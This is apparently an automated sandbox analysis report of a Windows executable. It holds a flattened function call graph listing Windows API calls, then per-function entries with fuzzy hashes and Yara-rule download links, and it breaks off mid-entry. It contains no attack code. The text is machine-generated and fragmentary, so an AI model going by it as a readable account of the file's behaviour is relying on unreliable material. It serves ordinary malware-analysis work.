7586 140007a50 7583->7586 7587 140007a79 7586->7587 7608 140012630 TlsGetValue 7587->7608 7590 140012630 TlsGetValue 7591 140007a9c 7590->7591 7610 1400126d0 TlsGetValue 7591->7610 7594 140007abf 7600 140007acf 7594->7600 7615 1400127f0 TlsGetValue 7594->7615 7597 140007c35 7616 1400128a0 TlsGetValue 7597->7616 7599 140007a1c 7600->7597 7600->7600 7601 140007b20 HeapAlloc 7600->7601 7602 140007b50 7600->7602 7601->7602 7602->7602 7603 140007b91 wcsncpy 7602->7603 7606 140007bac 7602->7606 7603->7606 7604 140007c02 7604->7597 7605 140007c09 HeapFree 7604->7605 7605->7597 7606->7604 7607 140007bdf wcsncpy 7606->7607 7607->7604 7609 140007a92 7608->7609 7609->7590 7611 1400126f4 7610->7611 7612 14001272d HeapReAlloc 7611->7612 7613 140007ab1 7611->7613 7612->7613 7613->7594 7614 1400127f0 TlsGetValue 7613->7614 7614->7594 7615->7600 7616->7599 7617 140008200 7620 140008260 7617->7620 7621 1400082e4 7620->7621 7622 140008397 7621->7622 7633 14000830a 7621->7633 7624 140012630 TlsGetValue 7622->7624 7623 140008221 7625 14000839f 7624->7625 7626 1400083ba 7625->7626 7627 1400083aa _wcsdup 7625->7627 7628 140012630 TlsGetValue 7626->7628 7627->7626 7629 1400083c2 7628->7629 7630 1400083d8 7629->7630 7631 1400083cd _wcsdup 7629->7631 7632 140012630 TlsGetValue 7630->7632 7631->7630 7634 1400083e0 7632->7634 7633->7623 7635 140008363 wcsncpy 7633->7635 7636 1400083eb _wcsdup 7634->7636 7637 1400083f8 7634->7637 7635->7633 7636->7637 7637->7637 7638 1400126d0 2 API calls 7637->7638 7639 140008481 7638->7639 7640 1400084ed wcsncpy 7639->7640 7641 140008488 7639->7641 7642 14000850e 7639->7642 7640->7642 7643 140008575 7641->7643 7644 14000856d free 7641->7644 7642->7641 7648 1400085c0 wcsncpy 7642->7648 7645 140008587 7643->7645 7646 14000857f free 7643->7646 7644->7643 7645->7623 7647 140008591 free 7645->7647 7646->7645 7647->7623 7648->7642 7947 14000d881 7948 14000d89d 7947->7948 7949 14000d8dc 7947->7949 7948->7949 7952 14000d8af 7948->7952 7954 14000d60c 7948->7954 7952->7949 7961 14000d6a0 7952->7961 7966 140016538 7952->7966 7955 14000d656 7954->7955 7956 14000d62f 7954->7956 7957 14000d654 7955->7957 7958 1400116f4 3 API calls 7955->7958 7956->7957 7959 1400168c0 HeapFree 7956->7959 7975 1400116f4 7956->7975 7957->7952 7958->7955 7959->7956 7962 14001147c 4 API calls 7961->7962 7963 14000d6b6 7962->7963 7964 14000d6c2 memset 7963->7964 7965 14000d6d6 7963->7965 7964->7965 7965->7952 7967 1400168b7 7966->7967 7972 140016541 7966->7972 7967->7952 7968 1400168b2 memmove 7968->7967 7969 140016860 memmove 7969->7972 7970 140016895 7970->7967 7970->7968 7971 140016538 wcslen HeapAlloc HeapFree 7971->7972 7972->7969 7972->7970 7972->7971 7973 140012360 HeapFree 7972->7973 7982 1400122f0 7972->7982 7973->7972 7976 14001170a EnterCriticalSection 7975->7976 7977 140011714 7975->7977 7976->7977 7980 14001177b HeapFree 7977->7980 7981 140011794 7977->7981 7978 1400117f1 7978->7956 7979 1400117e7 LeaveCriticalSection 7979->7978 7980->7981 7981->7978 7981->7979 7983 140012306 wcslen HeapAlloc 7982->7983 7984 140012351 7982->7984 7983->7984 7984->7972 8222 140013507 8223 14001350c 8222->8223 8224 140014d80 3 API calls 8223->8224 8225 1400134ee 8223->8225 8224->8225 7649 140011e0c 7651 140011e56 7649->7651 7652 140011ec4 7651->7652 7653 140011d30 7651->7653 7659 140011ef4 7653->7659 7656 140011d6e HeapAlloc 7657 140011d90 memset 7656->7657 7658 140011dc6 7656->7658 7657->7658 7658->7652 7660 140011d69 7659->7660 7663 140011ef9 7659->7663 7660->7656 7660->7658 7661 140011f38 HeapFree 7661->7660 7663->7661 7664 1400168c0 7663->7664 7666 1400168da 7664->7666 7665 1400169fd 7665->7663 7666->7665 7667 1400168c0 HeapFree 7666->7667 7668 140012360 HeapFree 7666->7668 7667->7666 7668->7666 7669 14000bc0c 7670 14000bc19 EnableWindow 7669->7670 7671 14000bc2b 7669->7671 7670->7671 7672 140014810 7673 14001482a 7672->7673 7674 140014869 7672->7674 7673->7674 7675 14001483f memmove memmove 7673->7675 7675->7674 7676 140016410 malloc 8354 140012390 HeapFree HeapFree 7985 14000c490 7990 14000c6e0 7985->7990 7988 14000c4c6 7989 14000c4ab GetCurrentProcess TerminateProcess 7989->7988 7993 14000c4f0 7990->7993 7994 14000c510 7993->7994 7994->7994 7995 14000c562 RtlLookupFunctionEntry 7994->7995 7996 14000c5b4 RtlLookupFunctionEntry 7995->7996 7998 14000c5f3 7995->7998 7996->7998 7999 14000c499 7996->7999 7997 14000c61b RtlVirtualUnwind 7997->7998 7997->7999 7998->7997 7998->7999 8000 14000c664 RtlLookupFunctionEntry 7998->8000 7999->7988 7999->7989 8000->7998 8000->7999 8226 140002914 8227 140012360 HeapFree 8226->8227 8228 140002926 8227->8228 8001 140012e97 8002 140012ead 8001->8002 8004 140012ea0 8001->8004 8003 140014d80 3 API calls 8002->8003 8002->8004 8003->8004 7677 14000281c 7684 140012600 TlsGetValue 7677->7684 7679 140002821 7680 140012360 HeapFree 7679->7680 7681 140002835 7680->7681 7682 140012360 HeapFree 7681->7682 7683 140002847 7682->7683 7684->7679 7685 140016420 free 8229 140017120 8230 1400171ae malloc 8229->8230 8231 140017140 MultiByteToWideChar 8229->8231 8232 1400171bc 8230->8232 8231->8230 8234 14001716d malloc MultiByteToWideChar 8231->8234 8234->8232 8005 14000bea0 GetWindowThreadProcessId GetCurrentThreadId 8006 14000bf31 8005->8006 8007 14000bec1 IsWindowVisible 8005->8007 8007->8006 8008 14000bece 8007->8008 8009 140011cb0 HeapAlloc 8008->8009 8010 14000bedf GetCurrentThreadId GetWindowLongPtrW 8009->8010 8011 14000bf06 8010->8011 8012 14000bf0a GetForegroundWindow 8010->8012 8011->8012 8012->8006 8013 14000bf15 IsWindowEnabled 8012->8013 8013->8006 8014 14000bf22 EnableWindow 8013->8014 8014->8006 7686 140013021 7688 140013026 7686->7688 7687 140014d80 3 API calls 7690 140012f79 7687->7690 7689 1400132aa memmove 7688->7689 7688->7690 7691 1400132ba 7688->7691 7689->7691 7691->7687 7691->7690 8015 1400034a2 8028 140012600 TlsGetValue 8015->8028 8017 1400034a7 8018 140012360 HeapFree 8017->8018 8019 1400034bb 8018->8019 8020 140012360 HeapFree 8019->8020 8021 1400034cd 8020->8021 8022 140012360 HeapFree 8021->8022 8023 1400034df 8022->8023 8024 140012360 HeapFree 8023->8024 8025 1400034f1 8024->8025 8026 140012360 HeapFree 8025->8026 8027 140003503 8026->8027 8028->8017 7692 140011024 7693 140011032 TlsFree 7692->7693 7694 14001103e 7692->7694 7693->7694 7695 14000e824 7696 14000e8e4 7695->7696 7704 14000fee4 7696->7704 7705 14000ff0b 7704->7705 7706 14000ff92 7705->7706 7707 14000ff47 memmove 7705->7707 7711 14000ea48 7707->7711 7709 14000ea48 memmove 7710 14000ff70 7709->7710 7710->7706 7710->7709 7712 14000ea81 7711->7712 7713 14000ea71 memmove 7711->7713 7712->7710 7713->7712 8373 140010fa8 8374 140010fbe 8373->8374 8375 140010fdd HeapFree 8374->8375 8376 140010fef 8374->8376 8375->8376 8377 1400021a8 8378 1400021ab 8377->8378 8379 140012360 HeapFree 8378->8379 8380 1400021ba 8379->8380 8381 140012360 HeapFree 8380->8381 8382 1400021cc 8381->8382 8383 140012360 HeapFree 8382->8383 8384 1400021de 8383->8384 7714 14001162c 7719 14001147c 7714->7719 7717 140011646 memset 7718 140011659 7717->7718 7720 1400114a4 7719->7720 7721 14001149a EnterCriticalSection 7719->7721 7722 14001155e HeapAlloc 7720->7722 7726 1400114b1 7720->7726 7721->7720 7723 140011586 HeapAlloc 7722->7723 7722->7726 7723->7726 7724 140011606 7724->7717 7724->7718 7725 1400115fc LeaveCriticalSection 7725->7724 7726->7724 7726->7725 7727 14000b62c 7728 14000b635 HeapFree 7727->7728 7729 14000b647 7727->7729 7728->7729 8038 1400040ac 8039 1400123e0 21 API calls 8038->8039 8040 1400040ce 8039->8040 8041 14000d6a0 5 API calls 8040->8041 8042 1400040da 8041->8042 8051 1400121c0 GetLastError TlsGetValue SetLastError 8042->8051 8044 1400040e4 8052 1400121c0 GetLastError TlsGetValue SetLastError 8044->8052 8046 1400040f8 8053 14000ca00 8046->8053 8050 140004122 8051->8044 8052->8046 8054 14000ca20 8053->8054 8055 1400126d0 2 API calls 8054->8055 8056 14000ca34 8055->8056 8057 14000ca3b memmove 8056->8057 8058 14000410d 8056->8058 8057->8058 8059 140012210 TlsGetValue 8058->8059 8060 140012251 HeapAlloc 8059->8060 8061 140012276 HeapReAlloc 8059->8061 8062 1400122a1 8060->8062 8061->8062 8062->8050 8235 14000432e 8238 140012600 TlsGetValue 8235->8238 8237 140004333 8238->8237 7730 140011a30 InitializeCriticalSection 8063 1400136b0 8064 1400136bf 8063->8064 8065 140013750 memmove 8064->8065 8066 140014393 8064->8066 8068 14001378b 8064->8068 8065->8068 8067 140014d80 3 API calls 8066->8067 8066->8068 8067->8068 8239 140016f30 8240 140016f60 8239->8240 8240->8240 8241 140016f6b MultiByteToWideChar 8240->8241 8242 1400126d0 2 API calls 8241->8242 8243 140016f97 MultiByteToWideChar 8242->8243 7539 14000c6b0 7540 14000c6d1 7539->7540 7541 14000c6c0 RemoveVectoredExceptionHandler 7539->7541 7541->7540 7731 140007a30 7732 140007a50 9 API calls 7731->7732 7733 140007a49 7732->7733 7734 140008230 7735 140008260 12 API calls 7734->7735 7736 140008251 7735->7736 8069 140008eb5 8070 140008ee3 8069->8070 8071 140008ec9 8069->8071 8074 140008ed4 8070->8074 8085 14000afc0 8070->8085 8071->8074 8075 140009da0 8071->8075 8076 140009dc9 8075->8076 8078 140009e0d 8075->8078 8095 14000b510 8076->8095 8078->8078 8079 140009da0 _wcsicmp 8078->8079 8082 140009de0 8078->8082 8080 140009e66 8079->8080 8081 140009da0 _wcsicmp 8080->8081 8084 140009e79 8081->8084 8082->8074 8083 14000b510 _wcsicmp 8083->8084 8084->8082 8084->8083 8086 14000afe9 8085->8086 8088 14000b02d 8085->8088 8087 14000b510 _wcsicmp 8086->8087 8092 14000b000 8087->8092 8088->8088 8089 14000afc0 _wcsicmp 8088->8089 8088->8092 8090 14000b086 8089->8090 8091 14000afc0 _wcsicmp 8090->8091 8094 14000b099 8091->8094 8092->8074 8093 14000b510 _wcsicmp 8093->8094 8094->8092 8094->8093 8096 14000b524 8095->8096 8097 14000b515 8095->8097 8096->8082 8098 1400070cc _wcsicmp 8097->8098 8099 14000b51e 8097->8099 8098->8082 8098->8095 8099->8082 8244 140014535 8245 14001455a 8244->8245 8245->8245 8246 140014779 memmove 8245->8246 8247 1400145dc 8245->8247 8246->8247 7737 14000bc38 7738 14000bc84 7737->7738 7739 14000bc4c 7737->7739 7739->7738 7740 14000bc51 SendMessageW Sleep PostMessageW 7739->7740 7740->7738 7745 14000e83b HeapAlloc 7746 14000e87d 7745->7746 7747 14000303f 7758 140012600 TlsGetValue 7747->7758 7749 140003044 7750 140012360 HeapFree 7749->7750 7751 140003058 7750->7751 7752 140012360 HeapFree 7751->7752 7753 14000306a 7752->7753 7754 140012360 HeapFree 7753->7754 7755 14000307c 7754->7755 7756 140012360 HeapFree 7755->7756 7757 14000308e 7756->7757 7758->7749 7759 14000c040 7764 140011248 EnterCriticalSection 7759->7764 7762 14000c075 7763 14000c05d CloseHandle 7763->7762 7765 14001127a LeaveCriticalSection 7764->7765 7766 14001126c 7764->7766 7767 14000c058 7765->7767 7766->7765 7767->7762 7767->7763 8100 1400048c0 8109 140012600 TlsGetValue 8100->8109 8102 1400048c5 8103 140012360 HeapFree 8102->8103 8104 1400048d9 8103->8104 8105 140012360 HeapFree 8104->8105 8106 1400048eb 8105->8106 8107 140012360 HeapFree 8106->8107 8108 1400048fd 8107->8108 8109->8102 8248 14000e540 8249 140011248 2 API calls 8248->8249 8250 14000e55f 8249->8250 8251 14000b740 8254 14000b758 8251->8254 8294 14000b5d8 8254->8294 8256 14000b790 8257 14000b5d8 2 API calls 8256->8257 8258 14000b79b 8257->8258 8259 14000b5d8 2 API calls 8258->8259 8260 14000b7a6 8259->8260 8261 14000b7b2 GetStockObject 8260->8261 8262 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 8260->8262 8261->8262 8263 14000be5c 3 API calls 8262->8263 8264 14000b83f 8263->8264 8265 14000bf44 7 API calls 8264->8265 8266 14000b84d 8265->8266 8267 14000b859 IsWindowEnabled 8266->8267 8268 14000b87a 8266->8268 8267->8268 8269 14000b863 EnableWindow 8267->8269 8270 14000be5c 3 API calls 8268->8270 8269->8268 8271 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 8270->8271 8272 14000b902 6 API calls 8271->8272 8273 14000bb96 8271->8273 8274 14000ba12 SendMessageW wcslen wcslen SendMessageW 8272->8274 8275 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8272->8275 8276 14000bba4 8273->8276 8297 1400127b0 TlsGetValue 8273->8297 8274->8275 8279 14000bb48 8275->8279 8277 14000bba9 HeapFree 8276->8277 8278 14000bbbb 8276->8278 8277->8278 8281 14000bbd2 8278->8281 8282 14000bbc0 HeapFree 8278->8282 8283 14000bb51 8279->8283 8284 14000bb0a GetMessageW 8279->8284 8286 14000bbd7 HeapFree 8281->8286 8287 14000b751 8281->8287 8282->8281 8288 14000bb56 DestroyAcceleratorTable 8283->8288 8289 14000bb5f 8283->8289 8284->8283 8285 14000bb20 TranslateAcceleratorW 8284->8285 8285->8279 8290 14000bb34 TranslateMessage DispatchMessageW 8285->8290 8286->8287 8288->8289 8289->8273 8291 14000bb68 wcslen 8289->8291 8290->8279 8292 1400126d0 2 API calls 8291->8292 8293 14000bb77 wcscpy HeapFree 8292->8293 8293->8273 8295 14000b5ea wcslen HeapAlloc 8294->8295 8296 14000b60e 8294->8296 8295->8296 8296->8256 8297->8276 7768 14000c444 7769 14000c455 7768->7769 7770 14000c44d SetEnvironmentVariableW 7768->7770 7770->7769 8110 14000cec4 8111 14000cf4b 8110->8111 8112 14000cee9 8110->8112 8112->8111 8114 14000cf02 8112->8114 8118 14000d140 8112->8118 8114->8111 8117 140016538 5 API calls 8114->8117 8125 14000d1f0 8114->8125 8134 14000d02c 8114->8134 8117->8114 8119 14000d15b 8118->8119 8120 14000d1b4 memset 8119->8120 8121 14000d163 HeapFree 8119->8121 8123 1400168c0 HeapFree 8119->8123 8124 1400116f4 3 API calls 8119->8124 8122 14000d1d0 8120->8122 8121->8119 8122->8114 8123->8119 8124->8119 8126 14000d230 8125->8126 8128 14000d210 8125->8128 8127 14001147c 4 API calls 8126->8127 8133 14000d22e 8127->8133 8128->8126 8129 14000d21d 8128->8129 8131 1400168c0 HeapFree 8129->8131 8129->8133 8130 14000d295 8130->8114 8131->8133 8132 14000d281 memset 8132->8130 8133->8130 8133->8132 8135 14000d073 8134->8135 8136 14000d04c 8134->8136 8140 14000d08f 8135->8140 8155 14000d3a4 8135->8155 8149 14000cf74 8136->8149 8139 14000d051 8139->8135 8141 14000d059 8139->8141 8142 14001147c 4 API calls 8140->8142 8143 14000d06e 8141->8143 8147 1400168c0 HeapFree 8141->8147 8144 14000d0a6 8142->8144 8145 14000d11c 8143->8145 8146 14000d108 memset 8143->8146 8144->8145 8148 14000d0ae wcslen HeapAlloc wcscpy 8144->8148 8145->8114 8146->8145 8147->8143 8148->8143 8150 14000cfa2 8149->8150 8152 14000cfe2 8149->8152 8151 14000d3a4 tolower 8150->8151 8153 14000cfa7 8151->8153 8152->8153 8154 14000cff8 wcscmp 8152->8154 8153->8139 8154->8152 8154->8153 8156 14000d3c7 tolower 8155->8156 8157 14000d3b8 8156->8157 8158 14000d3d0 8156->8158 8157->8156 8158->8140 8298 140003144 8299 140003147 8298->8299 8300 140012360 HeapFree 8299->8300 8301 140003156 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003168 8302->8303 7771 140002648 7772 14000264f 7771->7772 7773 140012360 HeapFree 7772->7773 7774 140002666 7773->7774 7775 140012360 HeapFree 7774->7775 7776 140002678 7775->7776 7777 140012360 HeapFree 7776->7777 7778 14000268a 7777->7778 7779 140012360 HeapFree 7778->7779 7780 14000269c 7779->7780 7781 140012360 HeapFree 7780->7781 7782 1400026ae 7781->7782 8159 1400088c9 8160 1400088e0 8159->8160 8161 1400088fa 8159->8161 8162 140009da0 _wcsicmp 8160->8162 8164 1400088eb 8160->8164 8163 14000afc0 _wcsicmp 8161->8163 8161->8164 8162->8164 8163->8164 7783 14000b64c 7784 14000b667 7783->7784 7785 14000b70e UnregisterClassW 7783->7785 7786 14000b68b 7784->7786 7788 14000b674 DefWindowProcW 7784->7788 7789 14000b67f 7784->7789 7787 14000b72c 7785->7787 7786->7787 7790 14000b6ea EnableWindow 7786->7790 7791 14000b6fc 7786->7791 7788->7787 7789->7786 7792 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7789->7792 7790->7791 7795 14000bf44 7791->7795 7792->7786 7796 14000bf57 EnumWindows 7795->7796 7797 14000bfbb 7795->7797 7799 14000b703 DestroyWindow 7796->7799 7800 14000bf77 GetCurrentThreadId 7796->7800 7798 14000bfc7 GetCurrentThreadId 7797->7798 7797->7799 7802 14000bfdb EnableWindow 7797->7802 7804 14000bff0 SetWindowPos 7797->7804 7806 140011c68 7797->7806 7798->7797 7799->7787 7801 14000bf85 7800->7801 7801->7799 7801->7800 7803 14000bf8b SetWindowPos 7801->7803 7802->7797 7803->7801 7804->7797 7807 140011c74 HeapFree 7806->7807 7809 14001f820 7807->7809 8165 1400130cb 8167 1400130d0 8165->8167 8166 140014d80 3 API calls 8170 140013480 8166->8170 8168 1400132ba 8167->8168 8169 1400132aa memmove 8167->8169 8168->8166 8168->8170 8169->8168 8304 140002b4c 8305 1400123e0 21 API calls 8304->8305 8306 140002b6a 8305->8306 8389 140016fd0 8390 140017000 8389->8390 8390->8390 8391 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8390->8391 7511 14000de50 7529 1400112a8 EnterCriticalSection 7511->7529 7513 14000de98 7514 14000deb6 7513->7514 7515 14000defb 7513->7515 7523 14000e04d 7513->7523 7516 14000dec9 7514->7516 7517 14000decd CreateFileW 7514->7517 7518 14000df42 7515->7518 7519 14000df00 7515->7519 7516->7517 7525 14000dfb7 7517->7525 7522 14000df5f CreateFileW 7518->7522 7518->7525 7520 14000df13 7519->7520 7521 14000df17 CreateFileW 7519->7521 7520->7521 7521->7525 7524 14000df8d CreateFileW 7522->7524 7522->7525 7524->7525 7525->7523 7526 14000dfe1 HeapAlloc 7525->7526 7527 14000dff9 7525->7527 7526->7527 7527->7523 7528 14000e036 SetFilePointer 7527->7528 7528->7523 7530 1400112e3 7529->7530 7531 1400112d0 7529->7531 7532 140011312 7530->7532 7533 1400112e9 HeapReAlloc 7530->7533 7534 140011cb0 HeapAlloc 7531->7534 7536 14001132d HeapAlloc 7532->7536 7538 14001131d 7532->7538 7533->7532 7535 1400112de 7534->7535 7537 140011352 LeaveCriticalSection 7535->7537 7536->7538 7537->7513 7538->7537 8171 1400086d0 8172 140008701 8171->8172 8173 1400086ee 8171->8173 8174 140008710 CharLowerW CharLowerW 8172->8174 8175 14000873e 8172->8175 8174->8172 8174->8175 7810 140002853 7831 1400123e0 7810->7831 7814 14000286b 7844 1400121c0 GetLastError TlsGetValue SetLastError 7814->7844 7816 140002889 7845 140012450 7816->7845 7818 140002898 7850 1400121c0 GetLastError TlsGetValue SetLastError 7818->7850 7820 1400028a6 7851 1400121c0 GetLastError TlsGetValue SetLastError 7820->7851 7822 1400028ba 7852 14000c8e0 7822->7852 7826 1400028d4 7857 1400125d0 TlsGetValue 7826->7857 7828 1400028e5 7858 14000b574 7828->7858 7830 1400028fb 7832 1400123ed 7831->7832 7833 14001240f TlsGetValue 7831->7833 7836 140012060 5 API calls 7832->7836 7834 140002861 7833->7834 7835 140012420 7833->7835 7843 1400121c0 GetLastError TlsGetValue SetLastError 7834->7843 7874 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7835->7874 7837 1400123f2 TlsGetValue 7836->7837 7865 140016cc4 7837->7865 7840 140012425 TlsGetValue 7842 140016cc4 13 API calls 7840->7842 7842->7834 7843->7814 7844->7816 7846 140012477 7845->7846 7847 140012469 wcslen 7845->7847 7848 1400126d0 2 API calls 7846->7848 7847->7846 7849 140012485 7848->7849 7849->7818 7850->7820 7851->7822 7853 14000c8f0 7852->7853 7854 1400126d0 2 API calls 7853->7854 7855 1400028ca 7854->7855 7856 140012520 TlsGetValue 7855->7856 7856->7826 7857->7828 7875 14000be5c GetForegroundWindow 7858->7875 7861 14000bf44 7 API calls 7862 14000b5a3 MessageBoxW 7861->7862 7863 14000bf44 7 API calls 7862->7863 7864 14000b5bf 7863->7864 7864->7830 7866 140016cf2 TlsAlloc InitializeCriticalSection 7865->7866 7867 140016d11 TlsGetValue 7865->7867 7866->7867 7868 140016de6 HeapAlloc 7867->7868 7869 140016d29 HeapAlloc 7867->7869 7870 14001240d 7868->7870 7869->7870 7871 140016d49 EnterCriticalSection 7869->7871 7870->7834 7872 140016d61 7 API calls 7871->7872 7873 140016d5e 7871->7873 7872->7868 7873->7872 7874->7840 7876 14000b596 7875->7876 7877 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7875->7877 7876->7861 7877->7876 8392 1400031d9 8393 1400031dc 8392->8393 8394 140012360 HeapFree 8393->8394 8395 1400031eb 8394->8395 8396 14000c3dc GetEnvironmentVariableW 8397 14000c408 8396->8397 8398 1400126d0 2 API calls 8397->8398 8399 14000c413 GetEnvironmentVariableW 8398->8399 8176 1400076e0 8177 14000773d 8176->8177 8179 1400076f1 8176->8179 8178 140007729 wcsstr 8178->8177 8179->8177 8179->8178 8313 140007760 8314 1400077e7 8313->8314 8315 140007769 8313->8315 8315->8314 8316 1400077b9 8315->8316 8317 1400077c0 wcsstr 8315->8317 8320 1400085f0 8316->8320 8319 1400077be 8317->8319 8321 14000869f 8320->8321 8322 140008617 CharLowerW 8320->8322 8321->8319 8323 140008630 8322->8323 8323->8321 8323->8323 8324 14000864c CharLowerW 8323->8324 8325 140008670 CharLowerW CharLowerW 8323->8325 8324->8323 8325->8323

                                                                                                            Executed Functions

                                                                                                            Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                                                                            • String ID: GetLongPathNameW$Kernel32.DLL
                                                                                                            • API String ID: 820969696-2943376620
                                                                                                            • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                                                                            • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                                                                            • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                                                                            • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340
                                                                                                            Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 4232179356-0
                                                                                                            • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                                                                            • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                                                                            • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                                                                            • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10
                                                                                                            Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151filememoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 102 14000dec9 100->102 103 14000decd-14000def6 CreateFileW 100->103 104 14000df42-14000df46 101->104 105 14000df00-14000df11 101->105 102->103 106 14000dfbc-14000dfc0 103->106 109 14000dfb7 104->109 110 14000df48-14000df59 104->110 107 14000df13 105->107 108 14000df17-14000df40 CreateFileW 105->108 113 14000dfc6-14000dfc9 106->113 114 14000e05d-14000e06f call 1400111dc 106->114 107->108 108->106 109->106 111 14000df5b 110->111 112 14000df5f-14000df8b CreateFileW 110->112 111->112 112->113 115 14000df8d-14000dfb5 CreateFileW 112->115 113->114 116 14000dfcf-14000dfd8 113->116 118 14000e074-14000e07c 114->118 115->106 119 14000dff9 116->119 120 14000dfda-14000dfdf 116->120 118->99 122 14000dffd-14000e02d 119->122 120->119 121 14000dfe1-14000dff7 HeapAlloc 120->121 121->122 123 14000e04d-14000e05b 122->123 124 14000e02f-14000e034 122->124 123->114 123->118 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2685021396-0
                                                                                                            • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                                                                            • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                                                                            • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                                                                            • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10
                                                                                                            Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
